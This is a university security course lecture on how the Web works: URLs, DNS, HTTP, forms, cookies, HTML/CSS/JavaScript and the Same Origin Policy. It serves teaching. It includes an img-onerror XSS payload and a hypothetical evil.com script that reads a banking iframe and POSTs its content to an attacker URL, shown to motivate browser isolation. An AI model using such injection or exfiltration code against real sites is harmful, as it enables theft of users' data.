World Wide Web#

The World Wide Web is probably nothing new to you; after all, the first thing you did today was probably doomscrolling on some social network, the very text you’re reading is served to you as a webpage, and all the assignments so far required interacting with a web server (Flask in our case) via a web client library (Python requests). Websites can now do practically anything a program running on your computer can, from accessing Bluetooth, battery level or your location, to using your GPU for rendering. And many programs you think are native are actually websites running their own browser instance via Electron. Web technology has grown far more powerful than its original authors could have imagined and is currently everywhere, so learning what makes it tick and what security implications it has is very important.

The distinction between the Internet and the World Wide Web#

Before we start, allow us a quick side-note on some terminological pedantry as old as time itself. The Internet is the technology currently used to connect billions of devices together and allow them to exchange arbitrary data — most notably the TCP/IP stack, but in a broader sense also DNS, Ethernet, BGP and co.; layers 1 to 4 in the traditional OSI model. The World Wide Web, on the other hand, is one of the applications which run on the Internet: the millions of websites that send you HTML via HTTP, linked together with hyperlinks. One can exist without the other — you can send and receive emails through the Internet without ever touching a Web browser (even though everyone uses web-based clients now anyway), and you can download websites through networks other than the Internet — for instance, the fabled Dark Web uses the Tor network to exchange data (even though Tor itself is an overlay network and uses the Internet in the background).

What had to happen before you could read this page#

After you clicked a link or typed in the URL of our website, it took just the blink of an eye, but quite a lot happened before you could start reading the text. Your web browser had to parse the URL, take the hostname from the URL and resolve it to an IP address via DNS, send some IP packets to establish a TCP connection to our web server, give it information about itself and the requested page via HTTP, get a response, render the HTML, use the instructions in it to fetch related images and other files, apply CSS styles and execute some JavaScript.

The URL#

The Uniform Resource Locator is made up of multiple parts: the scheme determines which protocol should be used to obtain the resource (http or https in the case of the Web); the authority comprises a host (either a DNS name or an IPv4/IPv6 address), optionally a port (when unspecified, the default for each protocol is used), and optionally a username with a password. The authority is followed by a path similar to a filesystem path, a query specifying additional information, and finally a fragment pointing to an element inside the page. Some characters in the URL may be percent-encoded — replaced with a percent sign followed by the hex-encoded ASCII code of the character.

(Image courtesy of Wikipedia user Alhadis, licensed under CC BY-SA 4.0)
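Python’s standard library splits a URL into exactly the parts described above; the URL here is just an illustrative example:

```python
from urllib.parse import urlsplit

url = "https://user:secret@example.com:8443/docs/intro?lang=en#top"
parts = urlsplit(url)

print(parts.scheme)    # protocol/scheme -> "https"
print(parts.username)  # -> "user"
print(parts.password)  # -> "secret"
print(parts.hostname)  # -> "example.com"
print(parts.port)      # -> 8443
print(parts.path)      # -> "/docs/intro"
print(parts.query)     # -> "lang=en"
print(parts.fragment)  # -> "top"
```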

There are many things that can go subtly wrong when parsing a URL, including the interpretation of invalid characters which we mentioned last time, or what happens when the user specifies the same query field multiple times — some web servers might choose the first or the last value, others might collect all the values into a list. Or: when is percent-encoding supposed to be interpreted, and how? (Like in the case of this Chrome bug, which caused a crash with a weirdly percent-encoded URL.)
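To see one concrete interpretation of these ambiguities, this is how Python’s urllib handles duplicate query fields and percent-decoding (other parsers may behave differently, which is exactly the problem):

```python
from urllib.parse import parse_qs, parse_qsl, unquote

# Duplicate query fields: parse_qs collects all values into a list,
# parse_qsl preserves them as ordered pairs. Other parsers may simply
# keep only the first or only the last value.
print(parse_qs("id=1&id=2"))   # {'id': ['1', '2']}
print(parse_qsl("id=1&id=2"))  # [('id', '1'), ('id', '2')]

# Percent-encoding: "%41" is the hex ASCII code of "A".
print(unquote("%41%20%2F"))    # "A /"
```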

Hostname resolution#

We will not go too deep into the inner workings of DNS in this lecture, but some of its implications might be interesting to us. To put it simply, it is a distributed database of small bits of data. When we want to know the IPv4 address of, for instance, one of the computers in Rotunda (u-pl1.ms.mff.cuni.cz), we first ask one of the root nameservers (the address of which we must know in advance, one of them is 198.41.0.4) for the A record for u-pl1.ms.mff.cuni.cz. It will not answer our question directly, as it doesn’t know the answer (that’s why it’s a distributed database), but gives us information on the most relevant nameserver for our question:

Output of the dig u-pl1.ms.mff.cuni.cz @198.41.0.4 command
; <<>> DiG 9.20.13 <<>> u-pl1.ms.mff.cuni.cz @198.41.0.4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19417
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 9
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;u-pl1.ms.mff.cuni.cz.		IN	A

;; AUTHORITY SECTION:
cz.			172800	IN	NS	a.ns.nic.cz.
cz.			172800	IN	NS	c.ns.nic.cz.
cz.			172800	IN	NS	b.ns.nic.cz.
cz.			172800	IN	NS	d.ns.nic.cz.

;; ADDITIONAL SECTION:
a.ns.nic.cz.		172800	IN	A	194.0.12.1
a.ns.nic.cz.		172800	IN	AAAA	2001:678:f::1
c.ns.nic.cz.		172800	IN	A	194.0.14.1
c.ns.nic.cz.		172800	IN	AAAA	2001:678:11::1
b.ns.nic.cz.		172800	IN	A	194.0.13.1
b.ns.nic.cz.		172800	IN	AAAA	2001:678:10::1
d.ns.nic.cz.		172800	IN	A	193.29.206.1
d.ns.nic.cz.		172800	IN	AAAA	2001:678:1::1

;; Query time: 99 msec
;; SERVER: 198.41.0.4#53(198.41.0.4) (UDP)
;; WHEN: Tue Oct 21 18:10:05 CEST 2025
;; MSG SIZE  rcvd: 296

To summarize, “the nameservers responsible for the cz. domain are … and their IP addresses are …”. We call these nameservers authoritative for the cz. domain.

So we ask the cz. nameservers:

Output of the dig u-pl1.ms.mff.cuni.cz @194.0.12.1 command
; <<>> DiG 9.20.13 <<>> u-pl1.ms.mff.cuni.cz @194.0.12.1
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56618
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 7
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;u-pl1.ms.mff.cuni.cz.		IN	A

;; AUTHORITY SECTION:
cuni.cz.		3600	IN	NS	nsa.ces.net.
cuni.cz.		3600	IN	NS	cuce.ruk.cuni.cz.
cuni.cz.		3600	IN	NS	david.ruk.cuni.cz.
cuni.cz.		3600	IN	NS	golias.ruk.cuni.cz.

;; ADDITIONAL SECTION:
cuce.ruk.cuni.cz.	3600	IN	A	195.113.0.8
cuce.ruk.cuni.cz.	3600	IN	AAAA	2001:718:1e03:1::8
david.ruk.cuni.cz.	3600	IN	A	78.128.213.242
david.ruk.cuni.cz.	3600	IN	AAAA	2001:718:1203:502::2
golias.ruk.cuni.cz.	3600	IN	A	195.113.0.2
golias.ruk.cuni.cz.	3600	IN	AAAA	2001:718:1e03:1::2

;; Query time: 12 msec
;; SERVER: 194.0.12.1#53(194.0.12.1) (UDP)
;; WHEN: Tue Oct 21 18:12:02 CEST 2025
;; MSG SIZE  rcvd: 277

and they tell us to ask the cuni.cz. nameservers, which direct us to the mff.cuni.cz. nameservers, which finally give us the answer: 195.113.21.131. Since going through this process for every single domain would be slow and the root nameservers would quickly get overloaded, there are two additional types of nameservers — recursive and caching. A recursive nameserver performs the whole resolution process and only gives clients the final answer (which it also caches for a while). Such nameservers are publicly available (for instance 9.9.9.9) or may be provided by your ISP. Caching nameservers usually forward requests to recursive ones, but also remember answers for some time. Such a nameserver most likely runs on your home router.
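To make the delegation chain concrete, here is a toy model of iterative resolution. Each “nameserver” is just a dict that either knows the final A record or delegates to a more specific server, mirroring the dig outputs above; the zone data is heavily simplified and the mff.cuni.cz nameserver address below is hypothetical. Real resolvers of course speak the DNS wire protocol over UDP/TCP.

```python
# Toy zone data: each server either delegates a suffix or answers directly.
ROOT = {"delegate": {"cz.": "194.0.12.1"}}
NAMESERVERS = {
    "194.0.12.1":    {"delegate": {"cuni.cz.": "195.113.0.8"}},
    "195.113.0.8":   {"delegate": {"mff.cuni.cz.": "195.113.19.71"}},  # hypothetical address
    "195.113.19.71": {"answers": {"u-pl1.ms.mff.cuni.cz.": "195.113.21.131"}},
}

def resolve(name: str) -> str:
    server = ROOT
    while True:
        if name in server.get("answers", {}):
            return server["answers"][name]  # authoritative answer, we are done
        # Otherwise follow the delegation for a matching suffix of the name.
        for zone, addr in server.get("delegate", {}).items():
            if name.endswith(zone):
                server = NAMESERVERS[addr]
                break
        else:
            raise LookupError(f"no delegation for {name}")

print(resolve("u-pl1.ms.mff.cuni.cz."))  # 195.113.21.131
```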

Why should we care about this? Firstly, rather obviously, DNS determines which server the clients end up connecting to, so controlling DNS allows an attacker to redirect all HTTP traffic. But hostnames are much more important for the web than just determining which server to connect to. HTTP, unlike many other protocols, actually sends the hostname you used to the server, so the same server, on the same IP address, might give you an entirely different response depending on which hostname you used. This is a very common remedy to IPv4 depletion — you don’t have to give each website its own IP address; just have one webserver with one address which serves a different website for each hostname, all with the same A record in DNS. Another aspect of the web where hostnames come into play are so-called origins — client-side security boundaries which we will discuss later.
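The server side of this name-based virtual hosting can be sketched in a few lines: one program, one IP address, but the response is chosen purely by the Host header. The hostnames and pages here are made up for illustration.

```python
# One server serving different sites for different Host headers.
SITES = {
    "beans.example":   "<h1>Welcome to the bean shop!</h1>",
    "bananas.example": "<h1>Bananas for everyone!</h1>",
}

def handle_request(host_header: str) -> tuple[int, str]:
    # Hostnames are case-insensitive, so normalize before the lookup.
    site = SITES.get(host_header.lower())
    if site is None:
        return 404, "Unknown host"
    return 200, site

print(handle_request("beans.example"))    # (200, '<h1>Welcome to the bean shop!</h1>')
print(handle_request("unknown.example"))  # (404, 'Unknown host')
```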

Clients and servers#

On the Web, there are two main sides — the server and the client. The client sends a request and the server sends a response. The client can be a web browser, a command-line tool like curl or a library like Python requests, and the server can be anything from a simple file server, which takes the path you give it, finds the file on the filesystem and sends you its contents, to a completely custom program, which generates the response for each request programmatically. Websites, as you might know, are not the only thing served by webservers — HTTP can be used to create Application Programming Interfaces (APIs), which programs use to communicate with each other. For instance, the entire Matrix messaging protocol is built on HTTP.

HTTP#

The HyperText Transfer Protocol is the main protocol used on the Web. It is an application protocol built on top of TCP: the client first establishes a TCP connection to the server, which acts as a bidirectional pipe for sending bytes, through which the client sends its request and the server sends back its response.

There are multiple versions of the HTTP protocol. Version 1.1 is the simplest and still very widely used; versions 2 and 3 maintain the same semantics, just encode them differently and introduce advanced, mostly performance-related, features. HTTPS encrypts and authenticates all traffic via TLS, but the plaintext data is normal HTTP.

Anatomy of a HTTP request and response#

A simple HTTP request to get the website you’re looking at right now might look something like this: (note that HTTP uses CRLF line endings)

GET /pitfalls/03-www/ HTTP/1.1
Host: kam.mff.cuni.cz
Connection: close

The first line contains the method (what we want to do with the resource), the path, and the version of HTTP we want to use. The following lines contain headers — key-value pairs separated by colons which communicate metadata about the request. In this case, the required Host header informs the server of the hostname from the URL (as we mentioned earlier) and the Connection: close header instructs the server to close the connection after sending the response.

A response might look something like this:

HTTP/1.1 200 OK
Content-Length: 25380
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en-us" dir="ltr">
 ...

The first line contains the version and a status code with its human-readable meaning. The following lines contain headers, followed by an empty line (or CRLF twice in a row) and then the content of the response.
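To see that there is no magic in the wire format, here is a minimal and deliberately naive parser for a response like the one above. Real clients handle many more edge cases (chunked encoding, repeated headers, malformed input), so treat this as a sketch of the structure only.

```python
def parse_response(raw: bytes):
    # The empty line (CRLF twice in a row) separates the head from the content.
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii").split("\r\n")
    # First line: version, status code, human-readable reason.
    version, status, reason = lines[0].split(" ", 2)
    # Remaining lines: "Key: value" headers.
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return version, int(status), reason, headers, body

raw = (b"HTTP/1.1 200 OK\r\n"
       b"Content-Length: 15\r\n"
       b"Content-Type: text/html; charset=utf-8\r\n"
       b"\r\n"
       b"<!DOCTYPE html>")
print(parse_response(raw))
```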

Methods#

HTTP defines multiple methods (sometimes called verbs), which define what we want to do with the resource, since HTTP can be used for other things than just GETing files.

  • GET — We want the server to reply with the data of the resource. Unlike requests with most other methods, GET requests may not contain content.
  • HEAD — Like GET, but we only want to receive the headers, not the content. Can be, for instance, used to check whether the resource has changed since we last saw it.
  • POST — Submit something new to the resource or perform a generic change in state. For instance login to your account or send an order for ice cream. POST requests will usually have some content.
  • PUT — Replace something that already exists with the request content.
  • DELETE — Delete something.
  • PATCH — Partially modify something.
  • OPTIONS — Used to determine which methods are permitted for the resource. Also used with CORS, which will be mentioned in future lectures.
  • CONNECT — Used by HTTP proxies.
  • TRACE — The request should continue through any proxy and get returned in the body of the response by the last server in the chain, like an HTTP alternative to ping. Most servers disallow it.

Individual methods also come with some guarantees about how the server may react to them — whether they are Safe, Idempotent and Cacheable.

  • Safe methods mustn’t modify any state on the server — browsers should be able to perform GET requests on any URL without performing any meaningful action on behalf of the user. GET, HEAD, OPTIONS and TRACE are Safe.
  • Idempotent methods must be repeatable without changing their outcome — calling DELETE twice on the same resource shouldn’t delete anything else. All Safe methods and additionally DELETE and PUT are Idempotent.
  • Responses to Cacheable methods may be cached (by proxies or browsers) and shown to users without requesting again, subject to other caching rules. Only GET and HEAD are Cacheable.
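These guarantees can be illustrated with a toy in-memory resource store (the paths and the storage scheme below are made up for the example): repeating an idempotent operation leaves the state unchanged, repeating a POST does not.

```python
store = {}

def put(path, content):
    store[path] = content   # replaces whatever was there -> idempotent

def delete(path):
    store.pop(path, None)   # deleting twice is the same as deleting once -> idempotent

def post(path, content):
    # Creates a NEW subresource each time -> not idempotent.
    store[path + "/" + str(len(store))] = content

put("/a", "x"); put("/a", "x")
assert store == {"/a": "x"}       # repeating PUT changed nothing

post("/orders", "ice cream"); post("/orders", "ice cream")
assert len(store) == 3            # repeating POST created a second order
```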

Notable headers#

There are many headers specified in the standard and even more non-standard ones which are nonetheless widely used. A full list can be found on MDN; we’ll mention only some of the interesting ones.

  • Content-Length specifies the length of the request/response content in bytes. Without it (or the alternative chunked transfer encoding), the recipient has no way of telling where the body ends, since multiple requests/responses may be sent over one TCP connection.
  • Content-Type specifies the MIME type of the content. An Accept header may be sent in a request to tell the server in advance which MIME types the sender is willing to accept.
  • Referer is the URL of the site which sent us here. When you click a link, the URL of the site containing the link will be placed in the Referer header. The Origin header is similar to Referer, but does not contain the path and may be used to enforce the Same Origin Policy.
  • User-Agent contains information about the client’s software — browser, library, command-line tool, sometimes also operating system or display manager.
  • Set-Cookie allows the server to set small pieces of information, which the client sends back with every request in the Cookie header.
  • Range can be used to request just a part of the document, for instance when a download of a large file fails mid-way.
  • Location contains the URL of a resource the client is being redirected to.
  • Many headers exist to control caching and allow browsers to figure out whether they need to fetch the site again or not, including Cache-Control, Age, Vary, Last-Modified and the If-* family.

Response codes#

Response codes summarize the meaning of the response in a machine-readable way. The full list can again be found on MDN. Response codes can be split into 5 categories by the hundreds digit; x00 is usually the most general variant in each category.

  • 1xx — Informational — seldom used, provides information about an ongoing request/response exchange.
  • 2xx — Successful — everything went (mostly) well
    • 200 — OK
    • 201 — Created, usually the response to a successful POST
    • 204 — No Content
  • 3xx — Redirection — you should find your response somewhere else
    • 300 — The client should choose between multiple versions. There’s no standardised way to perform this choice automatically, so it’s seldom used.
    • 301 — Moved permanently — You’ll find what you’re looking for at a different URL, and you should always use the new URL from now on.
    • 302 — Found — You’ll find what you’re looking for at a different URL, and you should check again next time.
    • 304 — Not modified — You should use the cached version of the resource you already have.
    • 307 — Temporary redirect — Newer variant of 302, additionally, you shouldn’t change the request method.
    • 308 — Permanent redirect — Newer variant of 301, additionally, you shouldn’t change the request method.
  • 4xx — Client error — Something is wrong and it’s your fault
    • 400 — Bad request
    • 401 — Unauthorized — I don’t know who you are, login please
    • 403 — Forbidden — I know who you are and I won’t send this to you
    • 404 — Not found — You probably know this one
    • 405 — Method not allowed
    • 418 — You tried to brew coffee in a teapot
  • 5xx — Server error — Something is wrong and it’s my fault
    • 500 — Internal server error
    • 502 — Bad gateway — The server tried to send your request to another server and it didn’t respond correctly.

Submitting forms#

HTML has had a way of sending information back to the server since the beginning: the <form> element. There are actually three different ways information from a form may be sent to the server.

The first one, used when you set the form’s method attribute to get, will (as the name suggests) send the data with a GET request. Since GET requests cannot contain content, the value of each <input> is sent as a query parameter in the URL; the name of the parameter is determined by the name attribute of each <input> element.

The input for the following form:

<form method="GET" action="/search">
  <input type="text" name="author">
  <input type="text" name="title">
  <input type="submit">
</form>

will be sent in a request similar to this:

GET /search?author=Mares&title=Pruvodce HTTP/1.1
Host: dspace.cuni.cz

Since GET requests may not modify any state and query strings get saved into your browser history, this method is mainly useful for searching, filtering or otherwise fine-tuning the retrieval of some resources.

The second way is used when you set the form’s method attribute to post. It sends a POST request with the <input> values in the same format as before, just in the request content instead of the path, with the Content-Type header set to application/x-www-form-urlencoded:

The input for the following form:

<form method="POST" action="/login">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit">
</form>

will be sent in a request similar to this:

POST /login HTTP/1.1
Host: example.com
Content-Length: 28
Content-Type: application/x-www-form-urlencoded

username=me&password=pass123
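The urlencoded body from this example can be reproduced with Python’s standard library, which also shows how special characters get escaped in this format:

```python
from urllib.parse import urlencode

body = urlencode({"username": "me", "password": "pass123"})
print(body)       # username=me&password=pass123
print(len(body))  # 28 -- the Content-Length from the example above

# Special characters get percent-encoded automatically (spaces become '+'):
print(urlencode({"q": "beans & rice"}))  # q=beans+%26+rice
```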

Finally, if you set the form’s method attribute to post and the enctype attribute to multipart/form-data, the multipart/form-data content type will be used. This is the only way to include file upload fields in a plain HTML form. When creating the request, a boundary is selected such that it never occurs in any of the sent values, and the values are then separated by these boundaries. Headers can be placed before the content of each value to provide metadata about it.

The input for the following form:

<form action="/evaluate" method="post" enctype="multipart/form-data">
  <input type="text" name="comment">
  <input type="file" name="solution">
  <input type="submit">
</form>

will be sent in a request similar to this:

POST /evaluate HTTP/1.1
Host: recodex.mff.cuni.cz
Content-Type: multipart/form-data; boundary=----geckoformboundary5a808c0936d1b2c17c790995ceaeea6c
Content-Length: 410

------geckoformboundary5a808c0936d1b2c17c790995ceaeea6c
Content-Disposition: form-data; name="comment"

This is my solution :)
------geckoformboundary5a808c0936d1b2c17c790995ceaeea6c
Content-Disposition: form-data; name="solution"; filename="solve.py"
Content-Type: text/x-python

import requests

print(requests.get("http://vulnbox/flag"))

------geckoformboundary5a808c0936d1b2c17c790995ceaeea6c--
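Assembling such a multipart body by hand is straightforward, as this sketch shows. The fixed boundary is for readability only; as described above, a real client picks a random boundary and checks that it does not occur in any of the values (file parts would additionally carry filename and Content-Type metadata):

```python
def build_multipart(fields: dict[str, str], boundary: str) -> bytes:
    parts = []
    for name, value in fields.items():
        # Each value is preceded by the boundary and a header describing it.
        parts.append(f"--{boundary}\r\n"
                     f'Content-Disposition: form-data; name="{name}"\r\n'
                     f"\r\n{value}\r\n")
    # The final boundary is marked with two trailing dashes.
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode()

body = build_multipart({"comment": "This is my solution :)"}, "boundary123")
print(body.decode())
```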

Nowadays, it is also quite common to process the contents of a form with JavaScript and send the data to the server asynchronously, in whatever format is convenient, for instance JSON.

Cookies#

Since the server has no way of telling different users apart,1 a mechanism was needed for websites to store bits of information in the user’s browser which could be used to identify them and retrieve data about them from the database or store relevant data about them directly. This is done with cookies.

Cookies are a key-value storage; the server can set cookies via the Set-Cookie header in the response:

HTTP/1.1 200 OK
Set-Cookie: session=dQw4w9WgXcQ
Set-Cookie: theme=dark

For every subsequent request, the browser then sends the Cookie header with all the cookies previously set by the server:

GET / HTTP/1.1
Host: example.com
Cookie: session=dQw4w9WgXcQ; theme=dark

Lifetime of cookies#

By default, cookies are deleted when the “current session” ends. When this happens is up to the browser, but it is commonly when you close the browser window. To prolong the lifetime of a cookie, you may set the Expires attribute to a date or Max-Age attribute to a number of seconds:

HTTP/1.1 200 OK
Set-Cookie: session=dQw4w9WgXcQ; Expires=Thu, 06 Nov 2025 12:00:00 GMT
Set-Cookie: theme=dark; Max-Age=2175984000
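Python’s standard library can parse cookie strings with these attributes, which is handy for inspecting them. The cookie below reuses the theme example; the Path attribute (discussed next) is added for illustration:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie.load("theme=dark; Max-Age=2175984000; Path=/")

morsel = cookie["theme"]
print(morsel.value)       # dark
print(morsel["max-age"])  # 2175984000
print(morsel["path"])     # /
```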

Scope of cookies#

Since users usually visit more than one website with their browsers, it would be both inconvenient and a security nightmare to send all cookies to everyone. That’s why the browser remembers the site which set each cookie and doesn’t send it to any other site. By default, a cookie will be sent with all requests to the same hostname as the one that set it.

You can customize this by setting the Domain attribute to a different domain, but it must be a suffix of the current one. After that the cookie will be sent with all requests to the specified domain and all subdomains (note that this doesn’t happen when you don’t set this attribute — setting the Domain attribute can only make the cookie more visible).

The Path attribute restricts the cookie to the provided path and all subpaths. The default is derived from the directory of the currently requested path, so if you set a cookie in response to a POST request to /login/submit, it will only be sent with requests to URLs that start with /login. Since this is usually not what you want, it is common to set the Path attribute to /.

Cookies and tracking#

You’ve probably already heard that “cookies are used to track you”, but how does that actually work? Let’s see an example of an ad company that pays websites for showing ads to their users. This usually works by embedding an iframe into the website, which shows the actual ad. So, you visit beans.com (because you want to buy some beans) and the site embeds an iframe of ads.net. When your browser makes the request to ads.net, it sets the Referer header to beans.com, so the ad company knows you’re viewing their ad embedded into beans.com and they know who to pay. In the response from ads.net, the server sends you a unique ID in a cookie. Later, when you visit bananas.com, which also embeds ads from the same provider, your browser makes a request to ads.net again, including Referer set to bananas.com and the ID cookie you got sent earlier. Now ads.net knows you’re the same person who visited beans.com earlier, so you probably like beans and now all your ads have beans in them. By doing this, the ad company can see all the sites with their ads you visit and create a fairly comprehensive profile of your interests.

HTML & CSS#

So far we’ve learned a lot about how browsers communicate with web servers over HTTP, but an equally important part of the Web is how browsers render the website data they receive, so let’s talk about HTML and CSS.

HTML (HyperText Markup Language) is a markup language which dictates the overall structure of the page, and CSS (Cascading Style Sheets) is used to further configure the appearance of the elements on the page. Even though they are separate languages, their responsibilities often overlap.

Since basic HTML website making is taught in NSWI141, we won’t go into detail about the basics. On the other hand, a lot of new tech has been introduced in the past few years which allows you to do things that originally required horrible hacks or humongous JavaScript frameworks. If it has been a while since you’ve written pure HTML, it might be nice to look through the list of all HTML elements and see what you’ve missed. Did you know there are two different progressbar-like elements? That there’s a whole API for custom components which lets you define React-like elements in just a few lines of JS? That you don’t need a preprocessor to nest CSS, use variables or handle dark mode?

Injections in HTML and CSS#

As with any markup language, you must be very careful to never let unsanitized user input get included in your HTML. If an attacker can run JavaScript from your site, they have access to all your users’ data and can impersonate your users, and you really do not want that. You might be tempted to think “Ah, I’ll just filter out all the <script> tags and it’ll be grand, ey?” But there are many ways to run JavaScript in HTML; for instance, the onerror attribute of the <img> tag allows you to run JavaScript whenever the loading of an image fails, so

<img src="nonexistent.png" onerror="alert(1)">

is just as good as a full blown script tag. Even if you can only inject CSS, you can still create a keylogger or leak the user’s history.

JavaScript#

Users of the web soon wanted to add more interactive elements to their static documents. It started out with forms allowing websites to send data from the user back to the server, but something more dynamic was needed. Netscape Navigator introduced JavaScript — a scripting language intended to add interactivity to HTML documents.

Take this web page, which uses JavaScript to validate whether the entered number is divisible by 13:

<input type="text" id="numbertotest" placeholder="Enter your number" onchange="check()">
<p id="result"></p>
<script>
// Select the relevant elements
const inputField = document.getElementById("numbertotest");
const outputTag = document.getElementById("result");
function check() {
  // Convert the string value to integer
  let inputValue = parseInt(inputField.value, 10);
  // Do the check and set the result accordingly
  if (inputValue%13==0) {
    outputTag.innerHTML = "<b>This number is divisible by 13!</b>";
  } else {
    outputTag.innerText = "This number is NOT divisible by 13!";
  }
}
</script>

The final page will then look like this:

A tree representation of the document’s nodes, accessible directly from JavaScript, is called the DOM (Document Object Model) — the document.getElementById calls find the wanted nodes in this tree. As users interact with the website, they create events — like the onchange here — which the JavaScript then processes; the developer can also just make some code run periodically, for example to fetch updates.

Over time, more and more features were added to JavaScript.

One of these is the fetch() API, which can be used to get (or post) data from (or to) a server; the response is then parsed and the website content is updated dynamically right in the browser.

We can use it to fetch a greeting from our course website and display it on the current page:

fetch("https://kam.mff.cuni.cz/pitfalls/test.json").then(r => r.json()).then(r => document.write(r["greeting"]))

While browsing the web today, you’ll notice most sites are highly interactive. Websites nowadays are quite big JavaScript programs running inside your browser, using the server only for state and communication. JavaScript frameworks such as React or Vue are used to facilitate this process. JavaScript is used for much more than just occasional interactivity.

The increasing amount of executed JavaScript created a big demand for browsers to run JavaScript fast, making browsers utilize JIT (just-in-time) compilers and advanced optimizations.

WebAssembly, an assembly-like language runnable in browsers, can be used to efficiently run C and C++, C#, Python, or pretty much any language right inside the browser, GUI included.

Browsers today are really massive pieces of software. There is however one aspect of them that we haven’t touched yet.

Everything they execute or work with must be considered untrusted.

When you browse the internet and click on an evil.com website, you don’t want that website to pose any danger to you. People often browse untrusted and shady websites, and then open their sensitive internet banking or family pictures in the same session. This means the browser needs to create strong security barriers between different sites, as well as between the sites and the computer itself.

Just take a look at this piece of code and consider that it is present on evil.com:

<iframe id="banking" src="https://internet-banking.com/dashboard">
</iframe>
<script>
// Get reference to the iframe with banking
const bankingFrame = document.getElementById("banking");
// Access the DOM of the inner website
let leakedBanking = bankingFrame.contentDocument.body.innerHTML;
// Exfiltrate the internet banking content back to the attacker
fetch("https://evil.com/exfiltrate", {
  method: 'POST',
  body: leakedBanking,
  headers: {
    'Content-Type': 'text/plain'
  }
})
</script>

The code uses an <iframe> tag to embed an internet banking website. An iframe can be used this way to embed other pages inside your page. Assume that the user of the browser is logged in, so the cookies and all the site data would load inside the iframe2.

The evil.com website now tries to access this juicy content using the JavaScript DOM API. You probably feel that this should fail, that this is dangerous and should not be possible. You are right.

Same Origin Policy (SOP)#

The Same Origin Policy is one of the main security boundaries inside web browsers.

Two websites can access each other’s data only if they have the same origin. An origin is the combination of the protocol, host, and port of the website’s URL. If two websites are on different origins, they should not be able to access each other’s data.

The following URLs are compared with http://store.company.com/dir/page.html:

URL                                               Outcome      Reason
http://store.company.com/dir2/other.html          Same origin  Only the path differs
http://store.company.com/dir/inner/another.html   Same origin  Only the path differs
https://store.company.com/page.html               Failure      Different protocol
http://store.company.com:81/dir/page.html         Failure      Different port (http:// is port 80 by default)
http://news.company.com/dir/page.html             Failure      Different host

(Table courtesy of Mozilla Developer Network, Mozilla Contributors, licensed under CC-BY-SA 2.5.)
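To make the comparison precise, here is a small helper that computes the origin triple from a URL, filling in default ports roughly the way a browser does (the example URLs are those from the table):

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url: str) -> tuple[str, str, int]:
    # An origin is the (protocol, host, port) triple.
    p = urlsplit(url)
    port = p.port if p.port is not None else DEFAULT_PORTS[p.scheme]
    return (p.scheme, p.hostname, port)

base = origin("http://store.company.com/dir/page.html")
print(origin("http://store.company.com/dir2/other.html") == base)   # True: only the path differs
print(origin("https://store.company.com/page.html") == base)        # False: different protocol
print(origin("http://store.company.com:81/dir/page.html") == base)  # False: different port
print(origin("http://news.company.com/dir/page.html") == base)      # False: different host
```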

So in our case, evil.com won’t be able to access internet-banking.com, because the origin is obviously different. So we are safe, or are we?

Well, it’s not that simple. The problem of securely isolating different contexts is complicated, even more so because of the document-oriented legacy of the web. However, modern browsers are mitigating these problems quite successfully. We will talk about both in more depth in the upcoming lectures.

Browser Developer Tools#

The developer tools (or just “devtools”) are a very useful toolbox built right into the web browser. They can usually be summoned by pressing F12 or by right-clicking the website and clicking “Inspect element”.

You can use them to browse the website’s DOM in the Inspector tab. Let’s see if you can use that feature to uncover a hidden operation of the number division checker above :)

There is also the Console you can use to execute JavaScript in the context of the website. You can use it to try running the JavaScript fetch code from above :)

DISCLAIMER: Never paste code you don’t trust into the console, as this can lead to an attacker compromising the data you have on the site where you do it.

Other useful tabs include the Network tab, where you can see all the requests made by the website. And the Sources or Debugger tab, where you can inspect all JavaScript that is included by the site.

TLDR#

  • Web technology is everywhere and it is incredibly complex
  • There is a difference between the Web and the Internet
  • Hostnames aren’t just for finding the right server; they also pose an important security boundary.
  • HTTP exists, has multiple versions and is used for many things other than websites.
  • There are three different ways to submit forms.
  • Cookies have lifetimes and scopes and can track you.
  • HTML and CSS have many new features you might not know about.
  • JavaScript started as a very simple form validation mechanism, but turned into the monster it is today.
  • Websites can run arbitrary code, so we need to sandbox them carefully.
  • Origins are important security boundaries and must be carefully protected.
  • Websites can easily be inspected and modified using DevTools.

Further resources#


  1. Well, except IP addresses, but with IPv4, many users might be connecting from the same NATed public IP, so it’s not very reliable… ↩︎

  2. In current browsers, there are even more fine-grained protections that allow sites to disable such embedding entirely or control precisely which cookies are sent.↩︎